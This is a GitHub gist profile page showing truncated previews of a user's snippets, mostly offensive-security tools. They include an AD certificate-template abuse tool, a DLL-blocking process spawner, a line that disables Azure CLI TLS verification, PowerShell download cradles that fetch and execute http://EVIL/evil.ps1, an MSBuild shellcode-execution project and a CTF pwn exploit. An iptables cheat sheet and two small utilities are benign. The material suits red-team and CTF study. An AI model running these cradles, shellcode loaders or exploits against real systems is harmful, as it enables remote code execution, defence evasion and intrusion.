Skip to content

Instantly share code, notes, and snippets.

View Reboare's full-sized avatar

Booj Reboare

32 followers · 20 following
  • UK
View GitHub Profile
@Reboare
Reboare / SharpApprover.cs
Created October 26, 2021 13:23 — forked from dmchell/SharpApprover.cs
Reset the mspki-enrollment-flag attribute when you possess a write ACE on a vulnerable certificate template
using System;
using System.DirectoryServices;
namespace SharpApprover
{
class Program
{
public static void SetAdInfo(string objectFilter,
int objectValue, string LdapDomain)
@Reboare
Reboare / spawn_blockdll.rs
Last active November 26, 2020 21:35
use std::ptr::null_mut;
use std::mem::{size_of, transmute};
use std::ffi::CString;
use winapi::shared::minwindef::{BYTE, TRUE};
use winapi::um::processthreadsapi::{InitializeProcThreadAttributeList, LPSTARTUPINFOA, CreateProcessA,
PROC_THREAD_ATTRIBUTE_LIST, UpdateProcThreadAttribute,
PROCESS_INFORMATION};
use winapi::shared::ntdef::PVOID;
use winapi::um::winbase::STARTUPINFOEXA;
@Reboare
Reboare / gist:2cfcf2ddd07f2ef18c1b3de94a67e0b2
Created September 24, 2019 14:08
Azure CLI disable HTTPS verification
export AZURE_CLI_DISABLE_CONNECTION_VERIFICATION=anycontent
@Reboare
Reboare / DownloadCradles.ps1
Created September 19, 2019 09:30 — forked from HarmJ0y/DownloadCradles.ps1
Download Cradles
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
@Reboare
Reboare / IPTABLES-CHEATSHEET.md
Created August 18, 2019 20:08 — forked from davydany/IPTABLES-CHEATSHEET.md
IP Tables (iptables) Cheat Sheet

IP Tables (iptables) Cheat Sheet

IPTables is the Firewall service that is available in a lot of different Linux Distributions. While modifiying it might seem daunting at first, this Cheat Sheet should be able to show you just how easy it is to use and how quickly you can be on your way mucking around with your firewall.

Resources

The following list is a great set of documentation for iptables. I used them to compile this documentation.

@Reboare
Reboare / gist:e7baa75017150d2886204525588dfb08
Created June 2, 2018 23:41
exec.csproj
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes shellcode. -->
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
<!-- Save This File And Execute The Above Command -->
<!-- Author: Casey Smith, Twitter: @subTee -->
<!-- License: BSD 3-Clause -->
<Target Name="Hello">
<ClassExample />
</Target>
<UsingTask
@Reboare
Reboare / linux_net_tcp.py
Last active October 29, 2023 14:29 — forked from sp3c73r2038/linux_net_tcp.py
a toolkit Python script looking into /proc/net/tcp
# -*- coding: utf-8 -*-
import re
import sys
def process_file(procnet):
sockets = procnet.split('\n')[1:-1]
return [line.strip() for line in sockets]
def split_every_n(data, n):
@Reboare
Reboare / README.md
Created February 13, 2018 14:56 — forked from FrankSpierings/README.md
Linux Container Escapes and Hardening
@Reboare
Reboare / sharifctf_vuln4.py
Last active February 4, 2018 18:34
from pwn import *
import struct
r = remote('ctf.sharif.edu', 4801)
#r = process('./vuln4')
first = r.recvuntil('find puts yourself')
'''
EIP+0 found at offset: 22
'''
x = 'A'*22
# ordinal=004 plt=0x080483a0 bind=GLOBAL type=FUNC name=puts
@Reboare
Reboare / sharif_15puzzle.py
Created February 4, 2018 18:27
#https://www.cs.bham.ac.uk/~mdr/teaching/modules04/java2/TilesSolvability.html
import re
puzzles = []
with open('puzzles.txt') as f_puzzles:
r_puzzles = f_puzzles.read()
for x in re.finditer("Puzzle for",r_puzzles):
puzzle = r_puzzles[x.start():x.start()+132]
puzzle = [x[1:-1].split('|') for x in puzzle.split('\n')[1:] if '+' not in x and x != '']